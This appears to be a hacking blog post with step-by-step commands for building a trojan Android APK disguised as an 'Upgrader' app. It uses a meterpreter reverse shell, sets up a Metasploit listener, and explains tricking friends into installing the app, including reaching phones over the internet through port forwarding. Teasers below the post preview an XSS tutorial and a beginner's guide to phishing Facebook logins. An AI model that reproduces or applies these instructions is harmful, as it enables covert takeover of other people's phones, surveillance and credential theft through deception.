Skip to main content

How to Hack Android Using Kali (Remotely)

Step 11 - Fire-Up Kali:

  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 22 - Open Another Terminal:

  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole

Step 33 - Set-Up a Listener:

  • After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 44 - Exploit!

  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  • Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open...

Step 5BOOM!

There comes the meterpreter prompt:

------------------------------------------HACKED-------------------------------------------------

The END:

Keep coming for more!
Some post modules that work for windows might not work in android
For Eg: run killavpersistence (persistent backdoor) etc.

Thank You!

Popular posts from this blog

Cross Site Scripting (XSS) Attack Tutorial

A Complete Guide to Cross Site Scripting (XSS) Attack,  how to prevent it, and XSS testing. Cross Site Scripting (XSS) is one of the most popular and vulnerable attacks which is known by every advanced tester. It is considered as one of the riskiest attacks for the web applications and can bring harmful consequences too.  XSS is often compared with similar client-side attacks, as client-side languages are mostly being used during this attack. However, XSS attack is considered riskier, because of its ability to damage even less vulnerable technologies. This XSS attack tutorial, we will give you a complete overview of its types, tools and preventive measures with perfect examples in simple terms for your easy understanding. Introduction to XSS Attack Cross Site Scripting attack is a malicious code injection, which will be executed in the victim’s browser. Malicious script can be saved on the web server and executed every time when the user calls the appropriate functionalit...

What is love?

Love is a kind of  chemical reaction , so you could never tell why it happens and you could never try to stop it by your own will. Love must have existed a long time before human beings developed language. People always want to find a definite answer about what is love, so they keep asking each other and themselves. However, there is no person who can define what love is. Every person has his or her own understanding about love, and a single person’s understanding about love may differ by time. Love is a general feeling of deep caring that does not change (although the form of expressing it may alter). I do not believe that we can force ourselves to love or not to love someone. We have the capacity to love many people. For example, you can love your children, parents, friends, and ex-spouse. Being “in love” with someone means that you feel a deep caring, you desire them sexually, and you want to spend lots of time with them. If you truly love them, then you may change the latter tw...

Complete Guide to Creating and Hosting a Phishing Page for Beginners

Recently I have come across many guides about creating phishing pages. Although the principles behind each guide is similar, most of the hosting solutions provided in the guide does not work anymore due to an increase in the crackdown of phishing pages by the hosting companies. In this guide, I will go through every step necessary to create and host a phishing page of your choice. Enjoy! Step 1 Download the HTML Index of the Target Webpage To start off, you need to obtain the HTML index of the page. There are various methods of doing this, there are even templates online for popular sites. In this tutorial, I am going to use the most basic way in order to be as noob-friendly as possible. Navigate to Your Webpage In this tutorial, I am going to phish Facebook. View the Source of the Webpage. Depending on your browser, there may be different methods. Normally it is done by right clicking the site and clicking "View Source". I have done that on my browser and a windows should co...